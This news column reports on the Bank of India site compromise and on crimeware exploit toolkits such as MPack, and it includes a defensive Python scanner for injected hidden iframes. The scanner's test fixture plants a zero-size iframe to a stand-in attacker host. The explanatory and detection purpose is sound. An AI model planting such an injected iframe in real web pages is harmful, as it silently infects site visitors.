For a few hours late last week, visitors to the Bank of India Web site had their browsers covertly redirected to a site hosting malicious exploits. Increasingly, criminals, often without any technical experience, are defacing popular Web sites with code that allows them to direct your browser to download content without you even knowing. Finjan, a security company that's been on the cutting edge of detecting Web 2.0 malware, identifies 10 toolkits for sale on the Internet, up from earlier this year. If you are an online criminal these days, says Yuval Ben-Itzhak, CTO of Finjan, "you are buying a software package from hackers. Without any computer science skill or any security background, you can install this package on any Web server and start to infect people with malicious code." As long as the thieves are making money, there appears to be no sign of stopping this current rise in crimeware.
The Bank of India
A few weeks ago, I wrote about the process: criminals inject JavaScript onto a live Web page; if the site is vulnerable to script injection attacks, the code (often an iFrame) gets added to the Web site. The site's administrators have no idea that their visitors are becoming infected with whatever code the criminals want to install--Trojans usually, sometimes bots. That's what happened to the Bank of India Web site. To see a real-time video capture of what happened to the Bank of India site, watch this video.
Roger Thompson, whose company, Exploit Prevention Labs, makes LinkScanner prevention software, offers his account of what happened. Thompson says there were multiple exploits used in the Bank of India attack. "One was a simple MS06-042, which was essentially cut and pasted from the original Milw0rm proof of concept. The second exploit set was an as-yet-unidentified exploit package, along the lines of MPack / IcePack / WebAttacker. The real difference, however, is that it had machine-generated variable and function names. In other words, the server-side script was generating the scripts in order to try to defeat scanners."
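The injection pattern described above (a hidden iframe appended to a legitimate page, pulling in content from an attacker-controlled host) is something a site owner or a link-scanning proxy can look for directly. The following is an added example, not code from the post, Finjan or Exploit Prevention Labs: it inventories every frame and script a page loads, flags frames that are sized to be invisible or that point off-site, and diffs the page against a known-good baseline so newly added resources stand out even when they look innocuous. The host names (`bank.example`, `bad.example`) and both HTML pages are constructed for the example.

```python
"""Content-integrity check for injected frames/scripts in an HTML page.

Added example (stdlib only). The sample pages are constructed; they are
not captures from the incident discussed in the post.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS that hides an element outright; a common trait of injected frames.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class _ResourceCollector(HTMLParser):
    """Collect every tag that can load remote content, with its attributes."""

    def __init__(self):
        super().__init__()
        self.resources = []  # list of (tag, {attr: value})

    def handle_starttag(self, tag, attrs):
        if tag in ("iframe", "frame", "script", "embed", "object"):
            self.resources.append((tag, dict(attrs)))


def _is_tiny(value):
    """True for width/height values such as "0", "1" or "0px"."""
    if value is None:
        return False
    m = re.match(r"\s*(\d+)", value)
    return m is not None and int(m.group(1)) <= 1


def _is_foreign(url, site_host):
    """True when the URL names a host other than the site's own."""
    host = urlparse(url).hostname
    return host is not None and host.lower() != site_host.lower()


def _loaded_urls(html):
    c = _ResourceCollector()
    c.feed(html)
    return {a.get("src") or a.get("data") for _, a in c.resources
            if a.get("src") or a.get("data")}


def scan_page(html, site_host):
    """Return (reasons, tag, src) for each resource that looks injected."""
    collector = _ResourceCollector()
    collector.feed(html)
    findings = []
    for tag, attrs in collector.resources:
        src = attrs.get("src") or attrs.get("data")
        if not src:
            continue
        reasons = []
        if tag in ("iframe", "frame") and (
                _is_tiny(attrs.get("width")) or _is_tiny(attrs.get("height"))):
            reasons.append("hidden-size frame")
        if HIDDEN_STYLE.search(attrs.get("style") or ""):
            reasons.append("css-hidden")
        if _is_foreign(src, site_host):
            reasons.append("off-site host")
        if reasons:
            findings.append((", ".join(reasons), tag, src))
    return findings


def new_resources(baseline_html, current_html):
    """URLs the current page loads that the known-good baseline did not."""
    return sorted(_loaded_urls(current_html) - _loaded_urls(baseline_html))


SITE_HOST = "bank.example"  # constructed host name

# Constructed known-good page: one local script, one visible local frame.
BASELINE_HTML = """<html><head><title>Welcome</title>
<script src="/js/menu.js"></script></head>
<body><h1>Welcome</h1>
<iframe src="/rates.html" width="400" height="300"></iframe>
</body></html>"""

# Constructed compromised copy: a zero-size iframe to an attacker host appended.
COMPROMISED_HTML = BASELINE_HTML.replace(
    "</body>",
    '<iframe src="http://bad.example/in.cgi?3" width="0" height="0" '
    'frameborder="0"></iframe></body>')

if __name__ == "__main__":
    for reasons, tag, src in scan_page(COMPROMISED_HTML, SITE_HOST):
        print(f"{tag} -> {src}: {reasons}")
    print("new since baseline:", new_resources(BASELINE_HTML, COMPROMISED_HTML))
```

The "off-site host" signal on its own will also flag legitimate third-party scripts (ad networks, analytics), so treat it as a score input rather than a verdict; the baseline diff is the sharper check, and it has to be run against the page as it is served right now. A verdict cached from an earlier crawl, like the whitelist approach criticised later in the post, says nothing about a page that was modified after the crawl.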
Who's responsible?
Who's responsible for creating these malicious code toolkits? Finjan's Ben-Itzhak says, "we see different groups creating them. We realize that the MPack group and the WebAttacker group are two different groups. We also believe the IcePack and Neosploit and MultiExploit toolkits are different groups, each using a different set of exploits." In July 2007, SecurityFocus editor Robert Lemos spoke with one of the members of Dream Coders Team, the party believed to be responsible for MPack. "We are just a group of people working together but doing some illegal business," he said. He also denied any contact with real-world Russian criminals.
The hacker said the Dream Coders Team (DCT) consists of three people, plus a few freelancers. The developers are all Russian, while the others are from various countries. DCT said that all the recent publicity has drawn the attention of law enforcement. "In Russia, there is a law which forbids (malicious software) creation tools like MPack, (but) we secure our systems to the best possible extent, so that even a police officer would not be able to get the PCs analyzed," said DCT. Despite these precautions, he said that "we will have to shut down the project soon."
More, not less
That doesn't appear to be happening. If anything, MPack still tops Finjan's list of the most popular toolkits available today. Also on the list are WebAttacker and WebAttacker II, IcePack, NeoSploit and MultiExploit. "However," Ben-Itzhak says, "we see additional ones that are less known, less popular, but they are out there. They're using different techniques from the big ones and we name them in our report."
Exploit Prevention Labs' Thompson agrees, saying one of the Bank of India attacks "contained a VML exploit, probably MS07-004, another MS06-042, a WinZip, a QuickTime, and a SetSlice. This would be very similar to MPack / Icepack except that it is missing an ANI (MS07-017), and it contains instead the VML." For the most part, these are exploits for patches already available from Microsoft. The assumption is that the user hasn't yet patched their system, which, sadly, is often the case with non-Microsoft software.
Few zero days included with these kits
Fortunately, zero-day exploits, attacks on previously unannounced software flaws, are rare within these crimeware toolkits, says Ben-Itzhak. "Usually we'll find zero-day attacks on third-party applications rather than Microsoft operating systems. So, you'll often find zero-day attacks relating to WinZip and Adobe Flash Player, because people usually are not updating them." That's because older versions did not include automatic updates; if you didn't know to update, you remain vulnerable.
He says "Flash and WinZip are the most popular ones--but we see some others such as CD content burners, some editing tools--but these are less popular applications. With Flash and WinZip you'll see them on almost any desktop around the world today. So that's the reason the hackers are interested in these exploits."
What can be done?
Both Finjan and Exploit Prevention Labs offer free safe surfing tools. I like Finjan SecureBrowsing and Linkscanner because they actively scan the pages loading into your Internet browser. That way if someone has injected malicious code onto, say, a trusted page, these products will alert you.
McAfee SiteAdvisor continues to disappoint me. It uses a white-list database, so if the site has already been checked and declared clean, you'll see that trusted green symbol even if the site was compromised just five minutes ago. Given that so much on the Internet changes within an instant, I fail to see how SiteAdvisor can promise to protect against these kinds of attacks. On the other hand, SiteAdvisor is effective against phishing sites, something that Finjan and Exploit Prevention Labs don't do well.
You can hear Yuval Ben-Itzhak talk more about the rise of crimeware in my most recent Security Bites podcast.
You can hear Roger Thompson talk more about MPack in this June 25, 2007 Security Bites podcast.
Are you worried about crimeware when you surf the Net? What are you doing to protect yourself? Talk back to me.